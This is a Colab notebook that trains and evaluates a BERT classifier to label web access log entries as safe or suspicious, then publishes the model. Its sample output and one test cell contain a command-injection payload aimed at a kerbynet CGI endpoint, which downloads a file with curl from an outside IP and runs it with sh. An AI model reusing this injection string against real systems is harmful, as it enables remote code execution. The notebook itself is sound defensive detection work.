<a href="https://colab.research.google.com/github/u-haru/log-inspector/blob/master/TransformAnnormalyLog.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [None]:
!pip install simpletransformers

In [None]:
#@title Generate dataset
import pandas as pd
import numpy as np
import logging

alldf = pd.read_csv("/content/drive/MyDrive/LogInspector/log_predicted.csv")
df = alldf[["path","referrer","useragent","predict"]].copy()
df.loc[df["predict"] < 0, "predict"] = 0
# df = df.drop_duplicates()

# socket.ioが多すぎるため部分的に削除
sock = df[df["path"].str.contains('socket.io')].sample(500)
df = df[df["path"].str.contains('socket.io') == False]

print("data length:%d; safe:%d; sus:%d"%(len(df),len(df[df["predict"]==1]),len(df[df["predict"]==0])))

ok = df[df["predict"]==1].sample(6000)
no = df[df["predict"]==0].sample(3000)

df = pd.concat([ok,no,sock])
df = df.reindex(np.random.permutation(df.index)).reset_index(drop=True)# シャッフル

print("dataframe length:%d"%len(df))

# 学習データの作成
all_data = []
for index, row in df.iterrows():
  # print(row["path"],row["referrer"],row["useragent"],row["scode"])
  all_data.append(["path: %s; ref:%s; ua:%s;"%(row["path"], row["referrer"], row["useragent"]), row["predict"]])
data_df = pd.DataFrame(all_data)

# 分割
p = int(0.75 * len(data_df))
train_df = data_df.iloc[:p, :]
eval_df = data_df.iloc[p:, :]

# ログの設定
logging.basicConfig(level=logging.INFO)
transformers_logger = logging.getLogger("transformers")
transformers_logger.setLevel(logging.WARNING)

data length:649636; safe:646090; sus:3546
dataframe length:9500


In [None]:
#@title Training
from simpletransformers.classification import ClassificationModel
import torch

param={'reprocess_input_data': True,
      'overwrite_output_dir': True,
      'num_train_epochs': 6,
      'use_early_stopping': True,
      'learning_rate': 1e-5,
}
train=False#@param {type:"boolean"}
eval=True#@param {type:"boolean"}
use_cuda=True#@param {type:"boolean"}
localmodel=True#@param {type:"boolean"}
MODELPATH="/content/drive/MyDrive/LogInspector/TransModel"#@param {type:"string"}

model = ClassificationModel('bert', MODELPATH if localmodel else "bert-base-cased", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param) # モデルの作成

if train:
  model.train_model(train_df) # 学習
if eval:
  result, model_outputs, wrong_predictions = model.eval_model(eval_df) # 評価
  print(result)



  0%|          | 0/2375 [00:00<?, ?it/s]

Running Evaluation:   0%|          | 0/297 [00:00<?, ?it/s]

{'mcc': 0.9942118401197232, 'tp': 1612, 'tn': 757, 'fp': 0, 'fn': 6, 'auroc': 0.9999175393076241, 'auprc': 0.9999619326451163, 'eval_loss': 0.01790157122472353}


In [None]:
#@title Test model
testdata = df.sample(1).iloc[0]
print("path: %s; ref:%s; ua:%s;"%(testdata["path"], testdata["referrer"], testdata["useragent"]))

predictions, raw_outputs = model.predict(["path: %s; ref:%s; ua:%s;"%(testdata["path"], testdata["referrer"], testdata["useragent"])]) # 予測
print(predictions, raw_outputs)
print("This access is " + ("safe" if predictions[0] else "suspicious"))

path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;"; ref:-; ua:-;


  0%|          | 0/1 [00:00<?, ?it/s]

  0%|          | 0/1 [00:00<?, ?it/s]

[0] [[ 5.10902023 -5.65708065]]
This access is suspicious


In [None]:
#@title Save model
%mkdir -p $MODELPATH
%cp -rf outputs/* $MODELPATH

In [None]:
#@title Evaluate on many accesses
eval_data = []
for index, row in alldf.sample(10000).iterrows():
  # print(row["path"],row["referrer"],row["useragent"],row["scode"])
  eval_data.append(["path: %s; ref:%s; ua:%s;"%(row["path"], row["referrer"], row["useragent"]), (row["predict"] if row["predict"] > 0 else 0)])
eval_df = pd.DataFrame(eval_data)
result, model_outputs, wrong_predictions = model.eval_model(eval_df) # 評価
print(result)

  0%|          | 0/10000 [00:00<?, ?it/s]

Running Evaluation:   0%|          | 0/1250 [00:00<?, ?it/s]

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}


In [None]:
#@title Print all suspective access
for index, row in df[df["predict"]==0].iterrows():
  print(row["path"],row["referrer"],row["useragent"])

In [None]:
%rm -r outputs

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

with many accesses  
{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}

In [None]:
!huggingface-cli login

In [None]:
from huggingface_hub import HfApi
api = HfApi()
api.upload_folder(
    folder_path=MODELPATH,
    repo_id="u-haru/log-inspector",
    repo_type="model",
)

In [None]:
from transformers import pipeline
inspector = pipeline('text-classification', model="u-haru/log-inspector")
inspector('path: /; ref:-; ua:-;')

[{'label': 'LABEL_1', 'score': 0.999984622001648}]

In [None]:
from simpletransformers.classification import ClassificationModel
model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
data = [['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://0.0.0.0/zero;sh zero;"; ref:-; ua:-;',0],['path: /; ref:-; ua:-;',1]]
result, model_outputs, wrong_predictions = model.eval_model(pd.DataFrame(data))
print(result)



  0%|          | 0/2 [00:00<?, ?it/s]

Running Evaluation:   0%|          | 0/1 [00:00<?, ?it/s]

{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}
